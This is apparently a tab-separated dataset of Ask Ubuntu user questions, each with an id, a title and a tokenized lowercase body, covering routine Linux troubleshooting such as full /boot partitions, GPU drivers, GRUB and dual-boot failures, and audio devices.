334610	can not install anything on ubuntu 12.04 full disc error	i tried installing build-essential and i keep getting this error : ( reading database ... 375528 files and directories currently installed . ) unpacking linux-image-3.2.0-51-generic ( from ... /linux-image-3.2.0-51-generic_3.2.0-51.77_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-51-generic_3.2.0-51.77_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-51-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-51-generic /boot/vmlinuz-3.2.0-51-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-51-generic /boot/vmlinuz-3.2.0-51-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-51-generic_3.2.0-51.77_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) even if i try to install anything else i still get the same error , tried searching for someone with the same problem , found some but it did n't help me fix my problem . filesystem size used avail use % mounted on /dev/mapper/mc-root 13g 4.7g 7.3g 39 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 791m 256k 791m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 0 2.0g 0 % /run/shm /dev/sda1 228m 228m 0 100 % /boot
334611	why does xubuntu 13.04 periodically blacken for no good reason	my xubuntu 13.04 periodically blackens the screen when i am actively using the machine . in one case i had just pressed pg_up a second before the behaviour occurred so i can rule out inactivity as a possible cause . how can i identify what is causing this ?
334612	wifi connected to android via laptop but internet is not coming	i have started wifi in my ubuntu using this process and is equivalent to ap-hotspot and i am able to connect my rooted android device to my laptop via wifi but i am not able to get internet connection in my mobile phone i use wired connection in my laptop . if i start wifi in my windows 8 using the connectify , i am able to use internet in my mobile . my wired connection is shared i have gone through this question how to share your internet connection
334614	files are gone but still occupy place	a couple of minutes ago i accessed my movies folder in windows 7 from ubuntu 13.04 , deleted a movie and somehow all my movies folder got deleted too . i restarted immediately to windows 7 to check if the folder is deleted there , and found out that it is . the weird part is that the folder possibly is gone , but the storage the folder used to occupy still has n't been freed ( about 200gb ) . when i right-click the folder i see that it occupies 20kb . how can i restore the folder ?
334615	international charcters `` pop-up '' like mac/android ?	i type a lot in other languages , but sometimes it 's just a word or two and it 's a hassle to go through and change the whole keyboard settings and back again ... is there a way to long-press a key and have international characters pop up ?
334620	sources.list , edit root	today i keep receiving this message with synaptic : e : malformed line 220 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report . how do i go to root gedit and correct line 220 ? line 220 is a blank line . presently , when i attempt to edit in gedit the message `` read-only '' comes up when i save . when i use terminal i get the same message at the top of the question . whatever is happening is disallowing a report to be sent to canonical .
334625	after updates sometimes ubuntu 13.10 is missing from uefi menu	sometimes i see internal hdd instead of ubuntu in boot menu after updates . i use shell.efi with its bcfg to recover ubuntu record . at the same time the windows record is not touched . how can i stop this from happening ?
334626	how do i enable digital output on a fiio e7 without ending session	when i plug my fiio e7 usb audio dac & amp in ubuntu 13.04 , it is recognised as audio dac but only by the analog output . i have to log-out and in again before the usb audio dac digital output ( s/pdif ) comes available in sound settings , which has much better quality . how do i enable the digital output manually , so i do n't have to logout ?
334629	playonlinux unable to find 32bit opengl libraries dual ati videocards	im curently running ubuntu 12.04 lts 64bit so , i installed league of legends fine the first time with the opensource ati drivers provided by ubuntu itself with no issues at all , but it runs so slow ... max 20fps because those drivers dont fully support my dual graphic cards than i restored system and i installed the linux version of the proper ati drivers from the amd website wich supports my apu amd-a8-4500m with the amd radeon 7640g + 7670m graphics cards enabling me full performance from my system .. problem is , to run league of legends i need a 32bit opengl library , and the driver , automaticly detects a 64bits linux install and loads the 64bit libraries but not the 32 ones . i need some kind of command , to force the 32bit libraries to load , or to make league of legends run on the 64 ones .. im kinda noob to ubuntu .. i installed the 32 bits ones trough terminal and still doesnt work idk why , maybe the driver doesnt want to load them .. plzz help me on this , i dont want to go back to windows just to play league since im noob idk what more details to post here so plz tell me what do you need
334636	how to use gnome color manager in ubuntu 12.04 ?	i need to correct colours displayed by my monitor . from the 'ubuntu software center ' i have installed the 'gnome color manager ' , but i can not use it for making my own colour profile : i have not found it ( as usually with a new software ) in the dash window to be able to run it ( and possibly lock to the launcher ) and see how to edit a colour profile by it . from the page recommended , i have downloaded the file gnome-color-manager_3.4.0-1_i386.deb and double-clicked at its row in krusader . something installed for about 1 second ( after previous sudo commands the system does not require the password ) , but i do not yet see how to run the program installed . terminal commands that i guessed do not work : i tried e.g tatatom @ katedrala : ~ $ gnome-color-manager gnome-color-manager : command not found tatatom @ katedrala : ~ $ gnome-color-manager_3.4.0 gnome-color-manager_3.4.0 : command not found tatatom @ katedrala : ~ $ color color : command not found tatatom @ katedrala : ~ $ argyll argyll : command not found , though tatatom @ katedrala : ~ $ krusader works ok and the 'ubuntu software center ' shows that i do have the 'color ' 'gnome color manager ' installed , with a 'color management system , calibrator and profiler ( argyll ) ' add-on , and offers their removing .
334637	run executable file on terminal	i 'm new to ubuntu and currently on it because of assignment . i would like to ask few questions : 1 ) how do i make new command to run a shell script ? for example , when you type `` passwd '' on terminal it runs the executable file on /usr/bin/passwd . how do i make it the same like my file ? 2 ) how do i change my shell script into a executable file like the passwd ?
334638	recordmydesktop rendering is bad	i have used recordmydesktop for a while an it worked very good , but now it have begin to draw lines through the desktop on the rendered video . i do n't know how that happened , but it would be good to still be using recordmydesktop . i hope you guys have an answer to this . it would be good . but if you have n't an answer i maybe have to change desktop recorded . then you can give me some advice of which program i should use then . thanks in advice : - )
334647	12.04 -desktop-i386 *new to linux*	today i got a .iso file of ubuntu named : `` ubuntu 12.04 -desktop-i386.iso '' . so have few queries about it as i am new to all this : question : will i be able to dual boot it with windows 7 home premium ? question : i will make a bootable pen drive for this , so using a 1 gb pen drive ( completely formatted ) will be enough ?
334648	how to install ubuntu during boot up	i 'm trying to install ubuntu but bloody windows is making it difficult ( most of my programs stopped working after windows downloaded an update ) . i tried to install ubuntu when the computer start up , even pressing f8 but it keeps going to windows .
334655	iso file size for 13.04 is larger than cd 's available space	the iso file for ubuntu 13.04 is larger than most of the cd 's where we burn the file . what do we have to do about this situation ?
334659	i forgot my ubuntu autheticate password !	i was trying to download gimp on my computer , it asked for a autheticate password ! of course i did n't know it , so i was n't going to try to type it in if it was only going to say it was wrong what should i do ?
334660	ubuntu heat problems with medion akoya notebook	my notebook heats up tremendously after i start ubuntu - i also noticed that it runs slower than my windows 7 ( not to mention the fact , that windows 7 does not come even close to the heat production of ubuntu ) . the specifications of my notebook are : intel dual core i3 , 2,6 ghz geforce gt540m ( 1 gb ) 2 gb ddr-ram i wonder if this could be because my notebook has onboard graphics and a graphics card ( hybrid graphics ) and ubuntu doesnt know which one to use ? i am really kind of desperate because i dont know if my notebook is crap or i just have wrong adjustments to my laptop ( i am running ubuntu via wubi btw as i am new to linux ) - but i really want to make the change and stop using windows .
334662	cron job every second	how can i run a php script every few seconds in ubuntu server ? ( bonus : how can i run random within the cron script , e.g . every 3 seconds + random ( 3 seconds ) )
334664	update errors on ubuntu- i get this message	w : failed to fetch http : //ppa.launchpad.net/shakaran/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/shakaran/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
334666	stuck when trying to install/upgrade packages	i ca n't do anything with apt-get because there are a stupid package that blocks it from working . this is what happens : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : gimp-help-sv : depends : gimp-help-common ( = 1:2.8-0precise8~ppa ) but 1:2.8-0precise16~ppa is installed e : unmet dependencies . try using -f. ok , i guess i run apt-get -f install then . $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : icedtea-netx-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : gimp-help-sv the following packages will be upgraded : gimp-help-sv 1 upgraded , 0 newly installed , 0 to remove and 27 not upgraded . need to get 0 b/29.6 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 803609 files and directories currently installed . ) preparing to replace gimp-help-sv 1:2.8-0precise8~ppa ( using ... /gimp-help-sv_1 % 3a2.8-0precise16~ppa_all.deb ) ... unpacking replacement gimp-help-sv ... dpkg : error processing /var/cache/apt/archives/gimp-help-sv_1 % 3a2.8-0precise16~ppa_all.deb ( -- unpack ) : unable to create `/usr/share/gimp/2.0/help/sv/gimp-tool-crop.html.dpkg-new ' ( while processing `./usr/share/gimp/2.0/help/sv/gimp-tool-crop.html ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gimp-help-sv_1 % 3a2.8-0precise16~ppa_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ok . but it ca n't be that i 've ran out of space ? $ df -h filesystem size used avail use % mounted on /dev/sda2 15g 11g 3.1g 79 % / udev 2.1g 4.1k 2.1g 1 % /dev tmpfs 828m 1.1m 827m 1 % /run none 5.3m 0 5.3m 0 % /run/lock none 2.1g 316k 2.1g 1 % /run/shm /dev/sda5 125g 103g 16g 88 % /home this is what happens whatever i am trying to do . how can i get rid of those stupid messages ?
334672	have a dell dimension 2400 ( installed ubuntu 13.04 ) after install and login , i get a purple screen	i am a fairly new user to ubuntu . as stated in the title , i have a dimension 2400 that i put 13.04 on . everything seemed to go perfectly , once i booted it up i got to my login , and then *boom , nothing happens , all i see is my mouse and wallpaper . i have done most of what has been said already in the forums : remove your xorg.conf sudo rm /etc/x11/xorg.conf reinstall xorg completely sudo apt-get install -- reinstall xserver-xorg-core libgl1-mesa-glx : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : amd64 libgl1-mesa-dri : amd64 sudo dpkg-reconfigure xserver-xorg reboot sudo reboot dconf reset -f /org/compiz/ unity -- reset-icons & disown sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop i have also tried this : press ctrl+alt+f1 and log in . install the jibby you 'll need to configure the settings by running this : sudo apt-get install compizconfig-settings-manager then run it by doing this : export display=:0 ccsm the first part tells the terminal which display you want it to load on ( otherwise it wo n't have a clue ) . press ctrl+alt+f7 ( or ctrl+alt+f8 sometimes ) to get back to the graphical display where there should be a compizconfig settings manager screen sitting there . find the unity plugin . enable it . everything should spring into life but if it does n't , you might have to restart . you can do that by going back to tty1 and running sudo reboot . and still nothing works . every time i log in , it 's still the same screen . *during using ccsm i can see the unity plugin , but it dose n't have a checkmark next to it . i have to open it up , to then try and enable it . but it never gets enabled . additionally i have tried to run this command just for it to say command not found yet i can browse to the exact spot it 's in . /usr/lib/nux/unity_support_test -p also when i run echo `` $ desktop_session '' it comes back with ubuntu , which means unity 3d should be running . please help , at this point i am so lost , and just want to go back to running windows . this is what my screen looks like after login . nothing is there :
334681	will applications for ubuntu touch have the same look as the desktop version ?	for example , the file manager and others softwares in development .
334685	nvidia x server twinview isses with 2 geforce 8600gt cards	full disclosure , i am relatively new to linux and loving the learning curve but i am undoubtedly capable of ignorant mistakes i have a rig i am building for my home office desktop . the basics : gigabyte mb amd 64bt processor ubuntu 12.04 64bit two nvidia geforce 8600gt video cards using a sli bridge two 22 '' dvi input hp monitors so here is my issue ( it is driving me nuts ) with x server . if i plug both monitors into gpu 0 x server auto configures twinview and all is grand , works like a charm , though both are running off of gpu 0 . if i plug one monitor into gpu 0 and one monitor into gpu 1 , x server enables the monitor on gpu 0 , sees but keeps the monitor on gpu 1 disabled . my presumption ( we all know the saying about presumptions ) is that all i would have to do is select the disabled monitor on gpu 1 and drop down the configure pull down and select twinview ... problem is when the monitors are plugged in this way , the twinview option is greyed out and can not be selected . what am i not understanding here ? is there some sort of configuration i need to do elsewhere for ubuntu to utilize both gpu 's ? any help will be most appreciated , thanks in advance .
334687	jailbreak ipod touch 4g ( 6.1.3 )	does anyone know how to jailbreak an ipod touch 6.1.3 under ubuntu ( 12.04 lts ) ? better if you have a terminal sudo way ! [ already tried evasi0n but it seems that the 6.1.3 is too advanced to be supported ] thank you in avance !
334688	why is there no 20 '' hp lcd information in raring ?	my hp s2031 is limited to 1024x768 max . i have spent hours tracking this down . i 've installed a new driver and had to remove it because it broke unity . i read about the amdconfig command , which is not on my system . i learned about the xrandr & cvt functions and attempted to use them with no change . xrandr -- newmode `` 1600x900r '' 97.50 1600 1648 1680 1760 900 903 908 926 +hsync -vsync using grep i found the file /usr/share/hwdata/monitorsdb , and i have determined that my monitor is not on the list . in fact , there are no 20 '' 1600x900 native resolution hp brand lcds in the file ! within the `` displays '' application the monitor is listed as unknown . is this the reason for the lack of proper graphics driver ? why my monitor can only be set to display a distorted 1024x768 or 800x600 ? does anyone know the format of the data to add to this monitorsdb file , and would it work ? my system 's output from cvt -r 1600 900 ( what i used ) is shown above . cvt 1600 900 yields : # 1600x900 59.95 hz ( cvt 1.44m9 ) hsync : 55.99 khz ; pclk : 118.25 mhz modeline `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync gtf 1600 900 60 yields : # 1600x900 @ 60.00 hz ( gtf ) hsync : 55.92 khz ; pclk : 119.00 mhz modeline `` 1600x900_60.00 '' 119.00 1600 1696 1864 2128 900 901 904 932 -hsync +vsync edit : users with less than 10 reputation ca n't answer their own question for 8 hours after asking . you can answer in 5 hours . until then please use comments , or edit your question instead . to fix no 1600x900 resolution for hp 20 '' monitor , i created /usr/local/bin/fix-resolution.sh containing these four lines # ! /bin/sh xrandr -- newmode `` 1600x900r '' 97.50 1600 1648 1680 1760 900 903 908 926 +hsync -vsync xrandr -- addmode vga-0 1600x900r xrandr -- output vga-0 -- mode 1600x900r these xrandr changes will disappear on reboot , so i made the script executable and then created the file /etc/xdg/autostart/fix-resolution.desktop containing these 4 lines [ desktop entry ] name=fix resolution exec=/usr/local/bin/fix-resolution.sh nodisplay=false to automatically execute the script on startup . the fix-resolution.sh script works when executed from the terminal after startup , but does not automatically run during startup . i assume that this is not the proper place to ask a question about the startup sequence , i 'm just letting you know what is needed to fix this problem in case anyone else has it too .
334689	can not install ubuntu ( 13.04 / 12.04 ) due to ext4 error	i was trying to install ubuntu 12.04 lts desktop 64bit edition on my new pc . ( 1tb sata hdd ) i set my mainboard to use bios to boot up . at first i tried installing next to windows 7 , got errors . now i tried to install it directly without having any windows on it -- > same error when selecting my timezone a popup showed up , saying that it was n't able to mount /dev/sda3 with ext4 . when opening the little console in the installation menu , the error vfs : ca n't find ext4 filesystem showed up . thanks in advance for any help on the question : how to i fix this error to install ubuntu on my machine . edit : i also tried using ubuntu 13.04 with the same errors . discs were burned on a mac and also verified using the burning tool as well as the `` check disk '' option on the disks . edit2 : i tried to make the partitions on my own ( 20 gb ext4 as / ; 8gb swap ; rest as /home ext4 ) and i also tried to let ubuntu create the partitions . edit3 : installing windows works without problems ( so it might not be the hdd ? )
334691	make command not working for installing shairport	here 's the deal : i 'm trying to install shairport for an airplay server . i 'm running the latest version of lubuntu . i 'm following these directions ( meant for a raspberrypi , but i do n't see any reason why they should n't work for any linux system ) . after i download and compile shairport , i 'm supposed to run make ( to build shairport ) . however , it keeps returning this error : make : *** [ hairtunes ] error 1 i installed make , uninstalled it , reinstalled it , recompiled shairport , and nothing works . any ideas ? when i run make , here 's the full text ( pasting the text in here was n't formatting right , so here 's a screenshot ) : http : //i.imgur.com/wkuaxg9.png thanks for any help !
334704	wol magic packet works , but unicast , broadcast , multicast do n't	i 'm setting up a home server with the idea that it should sleep when not in use , and wake when it 's needed ( someone tries to access it via ssh , samba , etc ) . ethtool reports that my intel card ( intel 82541pr gigabit ethernet controller rev 05 ) is capable of waking on unicast , multicast , broadcast , and magic packet ( but not p , for physical , or a ) . i set the umbg flags , and did some tests . wol via magic packet works like a charm , but no other manner of network activity wakes it from sleep . i tried a few things , including setting a static ip address using nm-tool , and manually setting up the arp entry on the machine i was using to access the server during the test , and nada . still wo n't wake . i have also checked bios , and there is n't anything in there to do with wol , other than just enabling of disabling the onboard ethernet card completely . does anyone have any ideas of things to try ? i 'm fresh out .
334710	how can i get driver for acer v5 571-g laptop ubuntu 13.04	i made lshw on my laptop and become this : id : serial description : smbus product : 7 series/c210 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency = 0 resources : memory : f3b14000-f3b140ff ioport : efa0 ( size=32 ) that means that no driver was installed for this device , right ? i do n't know how to get the driver and how to install . any advices for the newbie ? thanks in advance !
334711	execute command at user login	i 've searched and read tons of posts like this one but none seem to give a fix for what i 'm looking for : to only execute the command : sudo iwconfig wlan0 power off every time a user logs in . some solutions did n't work when the computer awakes from suspend state ( for example , putting the command into rc.local wo n't work at awakenings from suspend ) . i only need to execute that command every time the computer starts-up or otherwise comes back from suspend state or when i log-on after logging off . i also tried ~/.xinitrc to no avail . does anybody know for sure how to accomplish that apparently simple but somehow incredibly complex task ? thanks a lot in advance .
334713	does ubuntu v12.04.2 work on a system that normally run windows 7 64bit with an intel processor ?	ca n't get ubuntu-12.04.2-desktop-i386 . i get the message `` no default or ui directive found ! boot : '' after the failure on the win7 machine i took the exact same cd and used it on an older win xp 32 bit machine . the disk worked prefectly on the 32 bit machine .
334714	the disk drive for /boot/efi is not ready yet or not present	continue to wait , or press s to skip mounting or m for manual recovery and afterward partitioning with the kde partitionmanager said `` there are always 4 primary partitions on this device . i think i made a failure as i first installed kubuntu as i made just partition by partition , so that at least i have more then 4 primary partitions instead of the needed amount of primary partitions . what brings me to my first question : how many primary partitions can a linux installation generally have ? how can i move primary partitions to the extended partition so that the needed /boot/efi-partition can be added into the primary field . os is kubuntu 12.2 lte ihr kรถnnt mir auch in deutsch antworten
334716	external hard disk keep unmounted and remounting	di had problem with my external hard disk , when i plug the hard disk the permission was read only , after adding a line in /etc/fstab : uuid=d04a-0ae4 /media/toshibahdd exfat rw , uid=1000 , gid=1000 , user , exec , umask=003 , blksize=4096 0 0 so after that the permission of the hard disk change to read/write , problem now when i start copy file to the hard disk its unmount and remount ( disconnect ) , , , link of the log 's while am copying ... http : //paste.ubuntu.com/6000846/ note : 1- the previous post of the first problem http : //paste.ubuntu.com/6000846/ 2- the external hard disk work perfectly in windows platform . 3- i have tried change the file system type of the hard disk from exfat to fat32 with the same problem ... . i have tried to change to ntfs but could not do that .
334718	install ubuntu with nvidia drivers	how to install ubuntu without nouveau drivers but with selected driver like nvidia-325 ?
334719	x is n't working with nvidia geforce , no screens found	i recently installed ubuntu on a lenovo y500 with a nvidia geforce chip . startx does not work . first i was told that module nvidia did not exist , so i installed nvidia-current , which eliminated that issue . my x log file says my driver ought to be supporting my gpu . however , the file also returns the following warnings : falling back to old probe method for vesa falling back to old probe method for modesetting falling back to old probe method for fbdev and eventually : failed to initialize the nvidia gpu at pci:1:0:0 . failing initialization o x screen 0 so for some reason my gpu is n't initializing , even though my driver should be working with it . running startx reveals : nvidia : could not open the device file /dev/nvidia0 ( input/output error ) . but that does n't get recorded in the log file , for some reason . in dev , i can find the nvidia0 file , but when i nano it it 's empty . i suspect this is because of the file type , not its contents and i 'm just being stupid , but i thought it might be relevant . nothing else i can think of reveals anything about this file . so i thought , maybe it 's a permissions issue . sudo startx returned the same results . logging in as root changes nothing . i am now stuck . i can come up with nothing else . help me , askubuntu , you 're my only hope !
334720	if one window hangs whole unity interface is not useable by mouse	what really annoys me at my ubuntu system is , that if a window of a application hangs for some reason ( this for example happens often at the application keepass ) . then the whole unity interface ( and other windows ) seems to stop reacting for mouse clicks . so i always have to press the start menu key , type system monitor , and to navigate via keyboard to kill the process of the hanging application ... how can i fix this problem ?
334724	is there any easy way to get ubuntu back after reinstalling windows 8 ?	apparently i ca n't use the grub > root ( hd ... ) trick from a livecd because grub ca n't find itself . it is on /dev/hdb5 . there are 3 hard-drives . one has windows 8 and ubuntu 13 , one has ubuntu 12 , and the other is just data . also grub which is not by default part of the try-ubuntu13 dvd when apt-get did has no auto-complete so i ca n't figure out what grub thinks the drive layout is anyway . is that the end of my ubuntu 13 - should i just reinstall ubuntu because i ca n't boot into linux anymore ?
334727	install icecast-2.4beta3.tar.gz	i am trying to setup the newest version of icecast ( icecast 2.3.99.3 ) on my ubuntu 12.04lts machine . i have looked up several tutorials however it looks as though the file structure has changed . i have tried to edit the icecast.xml file in etc/icecast however when i try to open it using an editor , says can not be found . the text of tutorials looks the same in downloads/icecast/icecast-2.3.99.3/conf/icecast.xml.in . assuming this is correct , i installed using terminal and got the following results : dcrr @ dcrr-dell-dxp051 : ~ $ sudo apt-get install icecast2 [ sudo ] password for dcrr : reading package lists ... done building dependency tree reading state information ... done icecast2 is already the newest version . the following packages were automatically installed and are no longer required : libportaudiocpp0 libconfig++8 firefox-globalmenu libfindlib-ocaml-dev camlp4 libfindlib-ocaml libffado2 linux-headers-3.5.0-23 libasound2-dev ledit ocaml-findlib ocaml-interp libxml++2.6-2 libncurses5-dev libtinfo-dev linux-headers-3.5.0-23-generic ocaml-nox use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . dcrr @ dcrr-dell-dxp051 : ~ $ icecast2 start icecast 2.3.2 usage : icecast [ -b -v ] -c < file > options : -c < file > specify configuration file -v display version info -b run icecast in the background from the tutorials , i believe i am suppose to do this : /etc/default/icecast2 and set enable to true . however i can not find the file to do so . where to go from here , i am stumped . looks as though the most recent tutorial i can find is from 2012 . anybody have an updated version ?
334731	something wrong with my `.profile`	i recently installed a few softwares and needed to add their bin/ directories to my path . nothing abnormal so far . but i decided to be smart about it , and rewrote a part of my .profile so i did n't have to copy/paste the same few lines of codes over and over . here was my idea : # create an array with directories to be added to path declare -a addpath= ( `` $ home/bin '' `` $ home/.cabal/bin '' `` /opt/vert.x/current/bin '' ) # add directories recursively for dir in `` $ { addpath [ @ ] } '' ; do if [ -d `` $ dir '' ] ; then path= '' $ dir : $ path '' fi done i thought this had worked well.. until i rebooted my pc and got locked out of my session when trying to log in . it took me a while to figure out that it was actually because of my .profile ; once i commented those lines out , i was able to log into my session without being bounced back . my question is ; what did i do wrong with these lines ? is there a syntax error ? is there an other/better way to do that ? what happened ?
334737	build apache module in c	i 've a problem in building a apache c module . for compiling the module , i use the statement : sudo apxs2 -i/usr/include/mysql -i -a -c mod_aledav.c and the module seems to be compiled correctly , but when i try to restart apache , the output is : apache2 : syntax error on line 239 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/aledav.load : can not load /usr/lib/apache2/modules/mod_aledav.so into server : /usr/lib/apache2/modules/mod_aledav.so : undefined symbol : mysql_errno action 'configtest ' failed . the apache error log may have more information . ... fail ! can you help me ?
334749	share a folder from ubuntu to windows in virtualbox	i have ubuntu as my main operating system , but i run windows in a virtualbox because some of my programs are not supported , i have videos , documents etc on ubuntu and i would like to access them on windows without having to copy them to windows and having two copies of the same file . thanks in advance
334750	ubuntu 13.04 x32 server cli - how to enable - auto login via cli	ubuntu 13.04 x32 server auto login via cli please advise if there is a native option on ubuntu 13.04 x32 server cli mode ( non gui ) - auto login option
334751	install ubuntu on a laptop running xp	when i being to install ubuntu , the only choices for the 'desktop environment ' are ubuntu and all the other ... buntu ( s ) . i do n't see a choice for the laptop version . is this normal ? i am trying to install ubuntu for my dell laptop running xp . any advice or help is greatly appreciated
334756	what are the steps to create an ubuntu live cd with the server version ?	i used the 'startup disk creator ' with the 12.04 lts iso to create a bootable usb . this worked just fine , but when it started up it gave me a menu to : install ubuntu server multiple server install with maas check disc for defects test memory boot from first hard disk rescue a broken system what do i have to do to get it to boot directly into a login prompt ?
334757	how do i get an asound-cm106 ( usb ) sound card to work ?	i have a usb sound device asound-cm106 which apparently has the cm6206 chipset . i want to use it because i give the hell up trying to get my built in soundcard to work with my current setup ( it was always fine before ) i can sudo modprobe snd-hda-intel to get the refusing-to-do-anything built in card to appear in the sound card list but i have been left feeling like a useless idiot trying to figure out my way around this unity thing to try and make the usb device show up short of virgin sacrifice and prayers to dark gods . clearly sound is a lot more complicated than , say , running my companies apache servers and coding oo-php . the forums have been unusually unhelpful with every thread having wildly different answers which all seem to consist of downloading stuff , writing epics scripts in sub-voodoo languages , replacing the entire sound stack , patching the kernel or otherwise doing stuff that is so far over my head as to be incomprehensible . threads i 've found : https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/535476 http : //ubuntuforums.org/archive/index.php/t-1208429.html https : //lists.ubuntu.com/archives/ubuntu-uk/2009-june/019046.html all i want is to plug the silly thing in and get sound out of my speakers . could someone offer me a solution that any fool could follow . you may collect my geek card on your way through . i am using ubuntu 12.04 lts ( 64bit ) with an amd phenom ( tm ) ii x2 555 processor .
334759	ubuntu on asus ux51v is not loading	the laptop has two 128gb sdd drives in a raid configuration . the live usd worked fine . i then installed ubuntu 13.04 64bit which also completed successfully . when i removed the usb flash key and rebooted the laptop the bios shows up and it looks like there is no device to boot from.. what am i doing wrong ? i have already tried to disable secure boot as well as fast boot .
334760	file formats with gcc	i wrote some c code in a file and saved it with gedit . i then opened the terminal and tried compiling it with gcc but it gives me an error that it does not recognize the format of my c file . what format does gcc read ?
334761	how can i get back missing features in ubuntu ?	i recently downloaded ubuntu 12.04 . when i first started out i was able to reorganize my launcher by dragging it off of it and repositioning it . i also used to be able to move windows between workspaces while showing all 4 . but for some odd reason both of these features are gone . how can i get them back ?
334763	boot trouble : windows 7/ubuntu 12	i have a new laptop that has windows 7 , and i wanted to dual boot windows/ubuntu . just like my old one was . so , i downloaded and burned ubuntu to disk . i then changed the bios setting to boot from cd/dvd drive ( it 's external ) installed ubuntu and loader works fine as long as i only want to use ubuntu . problem is , is that when i go to boot windows , it 's looking for a disk . i ca n't get to the bios , so does anyone know the command to change windows so that it boots from the hard drive ? ps : i do n't have a rescue disk . update : tried supergrub and now i 've lost both . windows and ubuntu are both gone from my boot list in bios ! ca n't boot anything ! ! ! does anyone have any other suggestions please ? ? my pc is now completely unusable . that supergrup just lists a # 13 & a # 15 error and no longer changes anything .
334765	nautilus file names are not visible after libreoffice invocation	when i open a libreoffice text document in nautilus , and then close it , the line within nautilus that lists the document appears to be highlighted , and in my case it is pink highlighting . there is no text visible within the highlighting so the name of the file is not visible . this appears to be a new feature or bug since i 've never noticed this before . normally , when files are selected in nautilus , i see them highlighted in a sort of brown colour with text in `` reverse video '' . after the file open/close operation , this is no longer the case and instead of brown , it is pink highlighting , and text is not visible . how can i fix this ? details : 12.04 lts with updates to approximately mid-august 2013 . hardware : samsung rf711 laptop with the nvidia geforce gt540m with optimus . i do not currently have a nvidia-specific driver enabled .
334767	what happened to the jockey-gtk command ?	i installed the jockey-gtk package using the following command : nathan @ ubuntu : ~ $ sudo apt-get install jockey-gtk reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : jockey-gtk 0 upgraded , 1 newly installed , 0 to remove and 176 not upgraded . need to get 3,228 b/3,228 b of archives . after this operation , 53.2 kb of additional disk space will be used . selecting previously unselected package jockey-gtk . ( reading database ... 153816 files and directories currently installed . ) unpacking jockey-gtk ( from ... /jockey-gtk_0.9.7-0ubuntu13_all.deb ) ... setting up jockey-gtk ( 0.9.7-0ubuntu13 ) ... but when i attempt to actually run the command : nathan @ ubuntu : ~ $ jockey-gtk the program 'jockey-gtk ' is currently not installed . you can install it by typing : sudo apt-get install jockey-gtk why am i receiving this error message ? i just installed the package ! this machine is running ubuntu 13.04 64-bit - which i installed only yesterday .
334769	setting up web hosting at home with ubuntu server and pointing it to actual domain	hi i have already got a domain name and installed ubuntu server along with bind9 . i want to configure it so that it points to my domain on internet . my current environment is as below : installed ubuntu 13.04 on virtual machine ( virtual box ) . installed bind 9 dns server . installed apache server i have got static ip from my isp which i configured in my home router so that it is live 24/7 . my domain requires two nameservers to point to my host computer where as i only have one computer , where i am going to host my site . can i create two name servers on one computer ? and if i can , how ? i 've only got one server . it will act as a dns / web / database server . as i have set up my static ip in my router , any request coming from outside world ( internet ) , how will it find my host computer which is inside my local network connected to my router . ( i have little idea that it is done through dns server but i am not sure how my router will route that request to my dns server which is the same pc as my host computer ) do i need to configure apache to point to my domain ? my apologies if my question sounds so silly . but i am new to dns and ubuntu and struggling a lot to get my way through it . thank you in advance for your time .
334777	installing netflix-desktop	i installed netflix-desktop on my system running ubuntu 12.04 , and the app simply would n't launch . i removed it with these instructions here . i also ran these commands to clear out any settings : rm -rf ~/.wine-browser and rm -rf ~/.netflix-desktop . i tried to reinstall with the instructions here , but i received the following error message : sudo apt-get install netflix-desktop reading package lists ... done building dependency tree reading state information ... done package netflix-desktop is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : wine-browser-installer e : package 'netflix-desktop ' has no installation candidate i also tried installing wine-browser-installer , and that did n't work . any suggestions ?
334778	ubuntu 13.04 x64 wo n't boot	i have 2 hardrives , 1tb and 500 gb the 1 tb has 4 partitions installed , primary one having windows 7 x64 i tried to install linux on the second hdd , ( the 500 one ) , and gave linux about 60gb , and it created another i guess 10gb swap partition . i selected dual boot windows 7 and ubuntu the installation was successful , but on restarting , it only booted windows 7 . it did not even show the boot menu option , grub . i tried changing hdd boot priorities in bios and also tried reinstalling ubuntu . it wo n't just boot . can you please give me a solution ? thanks -- -update -- - apparently boot repair did the trick . answer here : windows 8 installed ubuntu 12.10 boots straight to windows 8
